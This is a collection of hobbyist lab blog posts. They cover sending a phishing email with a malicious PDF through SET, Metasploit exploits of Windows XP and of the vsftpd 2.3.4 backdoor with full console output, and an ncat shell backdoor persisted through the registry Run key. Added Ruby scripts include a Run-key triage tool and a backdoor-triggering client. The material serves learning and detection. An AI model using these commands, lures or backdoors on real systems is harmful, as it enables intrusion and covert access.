Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer

99. Return to main menu.

We’ll select one:

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

And select one again:

Available templates:
1: Baby Pics
2: Order Confirmation
3: Status Report
4: How long has it been?
5: Dan Brown’s Angels & Demons
6: New Update
7: Computer Issue
8: Strange internet usage from your computer
9: WOAAAA!!!!!!!!!! This is crazy…
10: Have you seen this?

We’ll go for option three:

Send email to: Enter target email address

I’m going to send this to one of my web based email accounts:

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

I originally selected option one, but Gmail (and all my other web-based email providers) kept refusing the connection because the email carried a potentially dangerous attachment, so I was forced to use option two with my server-based email address.

set:phishing>2
set:phishing> From address (ex: moo@example.com):My email address
set:phishing> The FROM NAME user will see: :Make up a name
set:phishing> Username for open-relay [blank]:My server based email address
Password for open-relay [blank]: Password for server email
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com): Email server address
set:phishing> Port number for the SMTP server [25]: Outgoing server email port number
set:phishing> Flag this message/s as high priority? [yes|no]:y
[*] SET has finished delivering the emails

At this point I checked my “target” email account and an email had duly arrived entitled “Status Report” and a PDF attachment, simply entitled “Template”.

Interestingly, I tried to reply to the “sender” but the email address was not available, which is rather handy for stealth.

I opened the PDF attachment out of curiosity and it appeared blank, but it must somehow set off the buffer overflow and in the process connect back to the attacking machine.

Meanwhile, in the terminal I was asked:

set:phishing> Setup a listener [yes|no]:y

Which consequently activated Metasploit:

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.1.70
LHOST => 192.168.1.70
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.70:443
[*] Starting the payload handler…

It would have been rather satisfying to see this exploit complete, but that’s as far as I can go for the moment.

Installing Ruby Gem PacketFu in Kali Linux (Debian)


A short while ago I briefly mentioned the IP packet manipulation tool Scapy. I started reading Adam’s guide and noted this tool is written in Python. I then had the bright idea of finding an equivalent tool written in Ruby; the idea being that I would learn the tool itself whilst peeking under the bonnet to enhance my knowledge of Ruby.

I found a tool called PacketFu which is written in Ruby and bundled with Metasploit, but I wanted an install of this tool separate to Metasploit, so I could learn it, and the Ruby code independently.

Thus began three days of absolute hair-pulling frustration as I tried to achieve this goal. In the end I became so absolutely determined to install PacketFu that I re-loaded my entire Kali Linux OS in the process.

I have now installed PacketFu and thought I would detail the process in order to save others endless hours of futility.

I installed PacketFu via RubyGems, but before that the pcaprub gem is needed, and installing it kept failing with this error message:

pcaprub.c:8:18: fatal error: pcap.h: No such file or directory
compilation terminated.

I realised this was an issue with libpcap and, after confirming I had a recent version (1.3.0-1) and trying everything you can imagine, I hit the Synaptic Package Manager and basically selected for installation anything connected with libpcap and Ruby:

libpcapnav0

libpcap-ruby

ruby-pcap

libpcapnav0-dev

libpcap0.8-dev

libpcap0.8

The truth is, I don’t know which one of these installs did the job, but one of them did, as when I went back to the Terminal and input “gem install pcaprub” it worked like a charm.

UPDATE: Having just repeated the process, it would appear that libpcap0.8-dev is the package needed for the pcaprub installation; it is the -dev package that supplies the pcap.h header the compiler was complaining about.

Then came “gem install packetfu” and I checked the installation with these commands in the Terminal:

~# cd /var/lib/gems/1.9.1/gems/packetfu-1.1.8/examples

/var/lib/gems/1.9.1/gems/packetfu-1.1.8/examples# ruby packetfu-shell.rb

And was finally rewarded with:

[Image: the PacketFu shell banner]

Underneath this you should see something like:

>>> Use $packetfu_default.config for salient networking details.
IP: 192.168.1.100 Mac: 00:1d:e0:54:2f:7e Gateway: 00:03:2f:32:a5:3c Net: 192.168.1.0 Iface: wlan0
>>> Packet capturing/injecting enabled.

If you don’t see this underneath the banner, something is wrong, and from my experience it’s connected with pcaprub not being properly installed.

I found all of the documentation for PacketFu within the following folder:

/var/lib/gems/1.9.1/doc/packetfu-1.1.8/rdoc

Just hit one of the HTML docs which should open in a browser for you. Alternatively you can find all the PacketFu documentation online here.

Now to learn.

Hope this helps.

Where I’m at

It’s three months since I wrote my last “Where I’m at” post.

I must admit this cyber security hobby is something of a time vampire and extremely addictive. Here’s a breakdown of where I find myself currently:

Just upgraded to a Ruby Programming book known in the community as the “PickAxe” entitled: Programming Ruby 1.9 & 2.0 The Pragmatic Programmers’ Guide. This is the latest version of the book and I aim to run Ruby 2.0 in an RVM for the time being.

I’m attempting to get my hands on a cheap laptop from which to run Security Onion on a network tap, to learn about intrusion detection and make more use of Wireshark.

I want to explore packets at a deeper level and so have (finally) installed PacketFu which is a packet manipulation tool similar to Scapy but written in Ruby, which should also help with programming progress.

I shall continue working with the Open Web Application Security Project (OWASP) Broken Web Applications Project (owaspbwa) and hopefully learn more on Web Application security.

For light relief, I’m going all script kiddie and want to make use of Metasploit’s GUI Armitage and Nmap’s Zenmap. I’ve done quite a bit through the command prompt on both tools and need something more fun and visual.

I’ve come a long way in three months, but haven’t reached the foot of the mountain.

That’s where I’m at.

IP Packet Manipulation in Ruby: Goodbye PacketFu Hello Racket

My success with installing PacketFu was short-lived. I updated Metasploit and it broke. I updated the system and it broke. I closed the computer and it broke. That’s it, even my patience has limits.

The alternative Ruby Packet manipulation software appears to be Racket. As with PacketFu I believe it is (or was) bundled with Metasploit. I tried installing Racket (and Scruby and RubyForger) and it failed. I just happened to notice a comment written on the blog of the guy who coded Racket which said:

I realize I’m a bit behind the times here with my comment but I got the same error. I was able to solve it by switching my ruby version back to 1.8.7 … yayyy for RVM.

And so began my journey into the world of Ruby Version Manager (RVM). Put simply this allows us to install and switch between different versions of Ruby side by side. As I have Ruby version 1.9.3 I needed an RVM-managed version 1.8.7.

I installed RVM with this script in the Terminal:

\curl -L https://get.rvm.io | bash -s stable

(This pipes a remote script straight into bash. The RVM project signs its installer and publishes the GPG key on rvm.io; on any machine you care about, import that key and let the installer verify the signature rather than trusting the download blindly.)

Then to test the installation in the Terminal:

source /usr/local/rvm/scripts/rvm <– This puts us in the RVM environment.

type rvm | head -n 1

 rvm is a function

The “rvm is a function” confirms RVM is installed and working.

Next step was to have Ruby version 1.8.7 running in RVM:

rvm install 1.8.7

Now we need to install the gem inside the RVM environment, with the 1.8.7 ruby selected so the gem lands in that ruby’s gem directory rather than the system one:

source /usr/local/rvm/scripts/rvm
rvm use 1.8.7
gem install racket

And it’s loaded, now to check the install works.

To start with I wanted to run some of the Ruby example files in Racket, but we have to make sure we’re in the RVM environment first:

source /usr/local/rvm/scripts/rvm

And then navigate to the correct folder:

cd /usr/local/rvm/gems/ruby-1.8.7-p374/gems/racket-1.0.11/examples

And then run the example file:

ruby arp-send

Output

Usage: arp-send <interface> <opcode>

So I know it’s working.

Then to run Ruby Racket proper:

source /usr/local/rvm/scripts/rvm
rvm use 1.8.7
irb
require 'rubygems'
require 'racket'

And we’re ready to write Racket instructions in the Interactive Ruby Shell.

That’s as far as I’ve got. I now need to learn Racket and hope in the meantime it remains stable.
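As an added example serving both the PacketFu and the Racket posts (it is not code from either post, nor from those gems), here is what such libraries are doing under the bonnet: building an Ethernet/IPv4/TCP frame from fields, filling in the RFC 1071 checksums, and parsing the bytes back while verifying them. It uses only Ruby’s standard library, runs on whichever Ruby RVM gives you, and never touches the wire, so it works even while the gems themselves are broken. The MAC and IP addresses are constructed sample values.

```ruby
# Added example, not from the PacketFu or Racket posts: a minimal Ethernet/IPv4/TCP
# frame builder and parser in plain Ruby, showing what those gems do under the bonnet.
# Standard library only; nothing is captured or injected.

# RFC 1071 Internet checksum over a byte string (pads an odd length with a zero byte).
def inet_checksum(bytes)
  data = bytes.b
  data += "\x00".b if data.bytesize.odd?
  sum = data.unpack('n*').sum
  sum = (sum & 0xffff) + (sum >> 16) while sum > 0xffff   # fold the carries back in
  (~sum) & 0xffff
end

def mac_to_bytes(mac)
  mac.split(':').map { |h| h.to_i(16) }.pack('C6')
end

def bytes_to_mac(bytes)
  bytes.unpack('C6').map { |b| format('%02x', b) }.join(':')
end

def ip_to_bytes(ip)
  ip.split('.').map(&:to_i).pack('C4')
end

# IPv4 header without options; the checksum is computed over the header itself.
def build_ipv4(src_ip, dst_ip, payload_len, proto: 6, ttl: 64, id: 0x1234)
  hdr = [0x45, 0, 20 + payload_len, id, 0x4000, ttl, proto, 0,
         ip_to_bytes(src_ip), ip_to_bytes(dst_ip)].pack('CCnnnCCna4a4')
  hdr[10, 2] = [inet_checksum(hdr)].pack('n')
  hdr
end

# TCP header without options; its checksum also covers the IPv4 pseudo-header (RFC 793).
def build_tcp(src_ip, dst_ip, sport, dport, seq: 0, flags: 0x02, window: 65_535, payload: '')
  hdr = [sport, dport, seq, 0, 5 << 4, flags, window, 0, 0].pack('nnNNCCnnn') + payload.b
  pseudo = ip_to_bytes(src_ip) + ip_to_bytes(dst_ip) + [0, 6, hdr.bytesize].pack('CCn')
  hdr[16, 2] = [inet_checksum(pseudo + hdr)].pack('n')
  hdr
end

# Full frame: Ethernet header (dst, src, type 0x0800) + IPv4 + TCP (+ payload).
def build_frame(src_mac:, dst_mac:, src_ip:, dst_ip:, sport:, dport:, flags: 0x02, payload: '')
  tcp = build_tcp(src_ip, dst_ip, sport, dport, flags: flags, payload: payload)
  ip  = build_ipv4(src_ip, dst_ip, tcp.bytesize)
  mac_to_bytes(dst_mac) + mac_to_bytes(src_mac) + [0x0800].pack('n') + ip + tcp
end

# Decode a frame and verify both checksums; a header with a valid checksum sums to zero.
def parse_frame(frame)
  dst_mac, src_mac, ethertype = frame.unpack('a6a6n')
  raise ArgumentError, 'not an IPv4 frame' unless ethertype == 0x0800
  ip = frame.byteslice(14..-1)
  vihl, _tos, total_len, _id, _frag, ttl, proto, _csum, src, dst = ip.unpack('CCnnnCCna4a4')
  ihl = (vihl & 0x0f) * 4
  tcp = ip.byteslice(ihl, total_len - ihl)
  sport, dport, seq, ack, off, flags, window = tcp.unpack('nnNNCCn')
  pseudo = src + dst + [0, proto, tcp.bytesize].pack('CCn')
  {
    src_mac: bytes_to_mac(src_mac), dst_mac: bytes_to_mac(dst_mac),
    src_ip: src.unpack('C4').join('.'), dst_ip: dst.unpack('C4').join('.'),
    ttl: ttl, proto: proto, sport: sport, dport: dport, seq: seq, ack: ack,
    flags: flags, window: window, payload: tcp.byteslice(((off >> 4) * 4)..-1),
    ip_checksum_ok: inet_checksum(ip.byteslice(0, ihl)).zero?,
    tcp_checksum_ok: inet_checksum(pseudo + tcp).zero?
  }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample addresses; the SYN is never sent anywhere.
  frame = build_frame(src_mac: '00:1d:e0:54:2f:7e', dst_mac: '00:03:2f:32:a5:3c',
                      src_ip: '192.168.1.100', dst_ip: '192.168.1.79',
                      sport: 40_000, dport: 445, payload: 'SMB')
  parse_frame(frame).each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

The two `pack`/`unpack` format strings are the whole story: a gem like PacketFu wraps exactly this field-by-field layout in accessor methods and recalculates the checksums for you on `recalc`, which is why a frame you build by hand and then corrupt fails the checksum check while the IP header, which does not cover the payload, still verifies.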

Installing and running Metasploit Armitage in Kali Linux and my first scan

Armitage is a GUI front-end for Metasploit and although you can find instructions on installing this on Kali Linux, for me, it was no more difficult than running a Metasploit update (msfupdate) and typing armitage in the Terminal.

A pop-up box appeared with: Host 127.0.0.1 – Port 55553 – User msf – Pass test and I selected “connect”. Another pop-up box entitled “Start Metasploit” with “A Metasploit RPC server is not running or not accepting connections yet. Would you like me to start Metasploit’s RPC server for you?” and I selected “yes”. (The msf/test pair is Armitage’s default for the RPC server it starts on the loopback address; change it if that RPC service is ever exposed beyond 127.0.0.1.)

Once opened I selected Hosts >> Add hosts and gave the pop-up box the IP of my Ubuntu system running Security Onion. Once the computer screen with IP address image appeared in the “Target” panel, I simply right-clicked and selected scan.

[Image: Armitage scan of the Security Onion host]

I must admit, having spent the last six months in the Command Prompt this was a joy.

I checked out the Security Onion IDS and was surprised to note this was not detected by Snorby; however, it was in Sguil as represented by the Squert output:

[Image: Squert output showing the scan events]

Note the Yellow coloured bar indicates “reconnaissance” which of course this scan is.

I have a sneaking suspicion that Armitage is going to be very good fun indeed. :)

Detecting Metasploit Armitage attacks in Security Onion Via a Dualcomm Network Tap

Back from holiday and managed to get my hands on an excellent cheap Dell laptop and a Dualcomm Network tap.

I loaded the full Security Onion suite (Xubuntu 12.04 64-bit) on the Dell laptop and rigged the network tap to mirror the router and pump all the data to the laptop. To check it was working I opened Wireshark which confirmed every single packet flowing in and out of the router was being captured.

With Security Onion configured and Snorby and Squert up and running I went off and launched Metasploit Armitage exploits from another laptop against my Windows XP hacking lab.

It was satisfying to see this activity picked up in both Squert and Snorby:

[Image: Snorby alerts for the Armitage activity]

[Image: Snorby high-severity events]

The attacking IP was 192.168.1.70 and the target 192.168.1.79.

I’m delighted all of this has proved to function as expected. I just need to learn the ins and outs of Metasploit Armitage as I still haven’t managed to compromise my extremely vulnerable, unpatched and unprotected Windows XP system. Interestingly, Security Onion revealed some other “High Severity” intrusion activity on this XP system which was not instigated by me:

[Image: Snorby high-severity Google Talk/Jabber events]

As you can see it would seem that somebody/something else has taken advantage of the deliberately vulnerable state of the hacking lab. I don’t know what all of this “Google Talk/Jabber” is about but I will look into it out of interest and investigate the IP address.

Of course, do let me know if you’ve heard of this type of intrusion.


Metasploit: My First Successful Armitage Exploit

I just completed my first successful exploit in the marvellous Metasploit GUI Armitage.

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

First up, I added the “Host” which is the target IP address.

Then right clicked the “Host” and performed the scan, which is a bundle of inbuilt Metasploit scans (ftp, smtp, http, smb_versions), each gleaning information on the target.

[Image: Armitage with the host added and scanned]

Note the “Host” terminal image now bears the Windows logo as the detected operating system during the scan.

Then up to the toolbar Attacks >> Find attacks.

[Image: Armitage Find Attacks]

Once complete we can right-click the “Host” and select “Attack” which gives us a list of potential exploits.

At this point I cheated as my very first command prompt Metasploit exploit on this target machine was via “exploit/windows/smb/ms08_067_netapi” so I simply selected this from “smb” in the dropdown list.

But first I checked the exploit:

[Image: Armitage check of the ms08_067_netapi exploit]

So I launched the attack and within a few seconds the “Host” terminal image changed:

[Image: compromised host in Armitage]

The red terminal with electrical jolts indicates a compromised target.

Here’s the Output of the process:

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 20855
LPORT => 20855
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:57239 -> 192.168.1.79:20855) at 2013-09-02 18:27:27 +0100

meterpreter >

As you can see I have obtained a Meterpreter shell.

Right-clicking on the “Host” image now gives me “Meterpreter” in the dropdown with every conceivable option available at the click of a finger.

Metasploit Armitage is a fabulous tool.

Next time I’ll look to compromise an Ubuntu system that I’ve never exploited before.

Kali Linux Updated to Version 1.0.5

Just found out that an updated version of Kali Linux has been released with a few more bits and bobs.

To upgrade:

root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade

At the moment I’m studying Ruby, preparing for a course and buzzing on Ncat and its uses as a backdoor among other things. I did look at Netcat, but want to be able to use Proxychains which is reportedly easier with Ncat.

I will probably attempt to upload a portable Windows Ncat.exe file on to a compromised Windows system via Metasploit and play around with connecting to it.

I’ll blog it if I do.

Setting up a simple backdoor shell using Ncat via Metasploit Armitage

First I exploited my Windows system with Metasploit Armitage obtaining a Meterpreter shell as per this post.

Then I needed to upload the ncat.exe file (which I downloaded from here) to the target machine. In Armitage this is a breeze. Simply right-click the compromised terminal: >> Meterpreter1 >> Explore >> Browse Files. This gives you a nice list of files on the exploited machine:

[Image: Armitage Browse Files view]

Notice the “Upload” button from which we transfer files over on to the target system. Once complete you can refresh and check your file is indeed within the C:\WINDOWS\system32 directory. Once found right-click the file and “Execute” which brings up the “Input Arguments” box:

[Image: Armitage Execute dialog with the input arguments]

As you can see I entered -l 23 -e cmd, that is -l (listen) on port 23 and -e (execute) cmd, the Windows command shell, for whoever connects.

I then opened a Terminal on the attacking machine and attempted to connect with Ncat on the the target machine:

~# ncat 192.168.1.79 23 <– Input target IP and specified port

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

And as you can see this connection was successful. I can now close Metasploit and continue with this connection.

It’s worth noting that the -e option carries an implicit “keep open” behaviour, which means that Ncat stays up and listening even after a connection is terminated, ready for the next one.

It’s also worth noting that this is a non-persistent listener in that once the target machine is rebooted the connection is no longer available without executing the Ncat listener again. This can be overcome by ensuring the Ncat.exe program is executed on start-up.

I’ll try to blog the solution to this and also create a reverse connection.

Creating a persistent Ncat backdoor in Windows XP startup using Metasploit

I couldn’t figure out how to do this in Armitage and so had to resort to the good ol’ Terminal.

I exploited the XP system as per this post and obtained a Meterpreter shell.

First to upload the Ncat.exe file to the target machine (backslashes are doubled when typed into the Meterpreter console):

meterpreter > upload ncat.exe c:\\windows\\system32
[*] uploading  : ncat.exe -> c:\windows\system32
[*] uploaded   : ncat.exe -> c:\windows\system32\ncat.exe
meterpreter >

Next we need to get Ncat to execute on startup so we manipulate the Windows Registry:

[Image: Meterpreter registry commands adding the ncat value to the Run key]

Sorry the above is an image, pasting in the code messed up WordPress.

Note the -l (listen) 5777 (port number) arguments are set at this point.

We can double check our program is in the registry:

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (5):

VMware hqtray
TgZcTlqTJNmSbP
TIOzUGrTHgMzS
zmvSLZpTksgWih
ncat

meterpreter >

As we can see Ncat is included.

Now to reboot the target XP machine and see if we can establish a connection:

# ncat 192.168.1.79 5777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Lab1>

Voilà

Two issues to note.

Firstly a dirty great big command box is opened on startup which, if the user closes it, terminates our connection.

Secondly, I haven’t dealt with any tricky firewall issues that may prevent the inbound connection.

However, as a proof of concept, it works perfectly and I’m sure there are ways to prevent the command box opening so that the Ncat program runs without alerting the user.
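As an added example, not from the post, here is the defensive counterpart of the Run-key trick above: a small Ruby triage script that parses reg query-style output of the Run key and flags entries worth a second look (a netcat-family binary, listen/exec switches on the command line, or a value name that looks machine-generated like the ones in the listing). The input is a constructed sample modelled on the value names shown above; the path for the randomly named entry is made up, and the name rule is a rough heuristic, not a signature.

```ruby
# Added example, not from the post: triage of the Run key used above for persistence.
# Parses 'reg query'-style output (value name, type, data) and flags suspicious entries.
# Plain Ruby, runs offline on the constructed sample below.

RunEntry = Struct.new(:name, :type, :data)

NETCAT_BINARIES = %w[ncat.exe nc.exe nc64.exe netcat.exe].freeze
# Listen / exec switches of ncat (and nc): -l, -k, -e, --exec, --sh-exec, --lua-exec
LISTEN_EXEC_FLAGS = /(?:^|\s)(?:-l|-k|-e|--exec|--sh-exec|--lua-exec)(?:\s|$)/i

# Lines look like '    ncat    REG_SZ    C:\WINDOWS\system32\ncat.exe -l 5777 -e cmd.exe'
def parse_reg_query(text)
  text.each_line.filter_map do |line|
    m = line.match(/\A\s+(.+?)\s+(REG_[A-Z_]+)\s+(.*?)\s*\z/)
    m && RunEntry.new(m[1], m[2], m[3])
  end
end

# Basename of the program a command line starts, handling a quoted path with spaces.
def executable_of(command)
  cmd = command.strip
  exe = cmd.start_with?('"') ? cmd[1..].split('"', 2).first : cmd.split(/\s+/).first
  File.basename(exe.to_s.tr('\\', '/')).downcase
end

# Heuristic (an assumption, not a signature): names with many upper/lower-case flips
# and no spaces, like the generated ones in the listing above, deserve a look.
def random_looking_name?(name)
  letters = name.scan(/[A-Za-z]/)
  return false if name.include?(' ') || letters.length < 8
  flips = letters.each_cons(2).count { |a, b| a.match?(/[A-Z]/) != b.match?(/[A-Z]/) }
  flips.to_f / (letters.length - 1) >= 0.35
end

def triage_run_entry(entry)
  reasons = []
  exe = executable_of(entry.data)
  reasons << "netcat-family binary (#{exe})" if NETCAT_BINARIES.include?(exe)
  reasons << 'listen/exec switches on the command line' if entry.data.match?(LISTEN_EXEC_FLAGS)
  reasons << 'machine-generated looking value name' if random_looking_name?(entry.name)
  reasons
end

# Returns [[entry, reasons], ...] for entries with at least one reason.
def triage_run_key(text)
  parse_reg_query(text).map { |e| [e, triage_run_entry(e)] }.reject { |_, r| r.empty? }
end

# Constructed sample modelled on the listing above; the .vbs path is made up.
SAMPLE_REG_QUERY = <<~REG
  HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
      VMware hqtray    REG_SZ    "C:\\Program Files\\VMware\\VMware Tools\\hqtray.exe"
      TgZcTlqTJNmSbP    REG_SZ    C:\\DOCUME~1\\Lab1\\LOCALS~1\\Temp\\svc.vbs
      ncat    REG_SZ    C:\\WINDOWS\\system32\\ncat.exe -l 5777 -e cmd.exe
REG

if __FILE__ == $PROGRAM_NAME
  triage_run_key(SAMPLE_REG_QUERY).each do |entry, reasons|
    puts "#{entry.name}: #{entry.data}\n  -> #{reasons.join('; ')}"
  end
end
```

On a live box the same script can be fed the output of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` (and the HKCU, RunOnce and Wow6432Node variants), which is also the listing an analyst would pull when Security Onion shows an inbound connection to an unexpected port on a host.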

Metasploitable 2: Exploiting FTP server vsftpd backdoor

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4

In the Metasploit console:

msf > search vsftpd

Matching Modules
================

Name                                  Disclosure Date          Rank       Description
----                                  ---------------          ----       -----------
exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution

Then:

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

Name               Disclosure Date  Rank    Description
----               ---------------  ----    -----------
cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  21               yes       The target port

Exploit target:

Id  Name
--  ----
0   Automatic

And to the exploit:

msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling…
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.78:39930 -> 192.168.1.103:6200) at 2013-11-02 10:15:45 +0000

And to prove the exploit worked:

whoami
root

Root access obtained.

This exploit is based on a backdoor that was slipped into the source code of vsftpd version 2.3.4 (the release tarball was tampered with; it is not a bug in vsftpd proper): when the FTP username contains the smiley face “:)”, the daemon opens a listening shell, running as root, on port 6200.

Now that we know how the backdoor is triggered we can exploit it by hand from the Terminal. First we make a connection via ftp:

:~# ftp 192.168.1.103
Connected to 192.168.1.103.
220 (vsFTPd 2.3.4)
Name (192.168.1.103:root): whatever:)
331 Please specify the password.
Password:

We can use any password: the trigger is the “:)” in the username, and the listener on port 6200 is opened whether or not the login succeeds.

Then connect via Ncat:

:~# ncat 192.168.1.103 6200
whoami
root
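To make the exchange concrete, here is an added example, not from the post and not Metasploit’s own module: a Ruby script that plays both sides of the backdoor. The fake server imitates only what a backdoored vsftpd 2.3.4 shows on the wire (the 220 banner, the 331 reply, and a second listener that appears once a USER containing “:)” arrives) and answers id with a canned line instead of executing anything; the client performs the same steps as the ftp and ncat session above, including the short wait for the second port to appear. Ports are chosen at run time so it runs on one machine; against a real target the backdoor port is 6200.

```ruby
require 'socket'

# Added example, not from the post or from Metasploit: both sides of the vsftpd 2.3.4
# backdoor exchange. The "server" only imitates the observable behaviour (banner,
# 331 reply, second listener after a USER containing ":)") with canned answers.

TRIGGER = ':)'.freeze

def vsftpd_234_banner?(banner)
  banner.to_s.match?(/vsFTPd 2\.3\.4/)
end

# Imitation of the backdoored daemon on loopback: after a USER containing ":)" it
# opens the "shell" listener on backdoor_port. Nothing is executed, ever.
class FakeVsftpd
  attr_reader :port

  def initialize(backdoor_port:)
    @ctl = TCPServer.new('127.0.0.1', 0)
    @port = @ctl.addr[1]
    @backdoor_port = backdoor_port
  end

  def start
    Thread.new do
      client = @ctl.accept
      client.write "220 (vsFTPd 2.3.4)\r\n"
      while (line = client.gets)
        cmd, arg = line.chomp.split(' ', 2)
        case cmd.to_s.upcase
        when 'USER'
          client.write "331 Please specify the password.\r\n"
          open_backdoor if arg.to_s.include?(TRIGGER)
        when 'PASS' then client.write "530 Login incorrect.\r\n"
        else client.write "500 Unknown command.\r\n"
        end
      end
      client.close
    end
    self
  end

  def stop
    @ctl.close
  end

  private

  # Canned answers instead of a real shell: "id" gets the uid=0 line the exploit checks for.
  def open_backdoor
    shell = TCPServer.new('127.0.0.1', @backdoor_port)
    Thread.new do
      conn = shell.accept
      while (line = conn.gets)
        conn.write(line.strip == 'id' ? "uid=0(root) gid=0(root)\n" : "root\n")
      end
      conn.close
      shell.close
    end
  end
end

# The backdoor listener appears a moment after the trigger, so poll for it briefly.
def connect_with_retry(host, port, attempts: 50)
  attempts.times do
    return TCPSocket.new(host, port)
  rescue Errno::ECONNREFUSED
    sleep 0.1
  end
  nil
end

# Client side: the same steps as the manual ftp + ncat session.
def trigger_vsftpd_backdoor(host, ftp_port, backdoor_port: 6200)
  ftp = TCPSocket.new(host, ftp_port)
  banner = ftp.gets.to_s.strip
  unless vsftpd_234_banner?(banner)
    ftp.close
    return { banner: banner, vulnerable_banner: false, backdoor_open: false }
  end
  ftp.write "USER pentest#{TRIGGER}\r\n"
  user_reply = ftp.gets.to_s.strip
  ftp.write "PASS anything\r\n"            # the password plays no part in the trigger
  shell = connect_with_retry(host, backdoor_port)
  result = { banner: banner, vulnerable_banner: true, user_reply: user_reply,
             backdoor_open: !shell.nil? }
  if shell
    shell.write "id\n"
    result[:id] = shell.gets.to_s.strip
    shell.close
  end
  ftp.close
  result
end

def free_tcp_port
  s = TCPServer.new('127.0.0.1', 0)
  port = s.addr[1]
  s.close
  port
end

if __FILE__ == $PROGRAM_NAME
  port = free_tcp_port
  server = FakeVsftpd.new(backdoor_port: port).start
  p trigger_vsftpd_backdoor('127.0.0.1', server.port, backdoor_port: port)
  server.stop
end
```

The banner check is the same thing the Metasploit module prints as “Banner: 220 (vsFTPd 2.3.4)”; a banner alone does not prove the box is backdoored (a clean 2.3.4 build prints the same string), which is why the connect-to-6200 step, not the version match, is the real test.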

Here’s a Security Tube video demonstrating the above. It’s worth viewing the Security Tube page which details the injected backdoor code.

And here’s another video using Netcat:
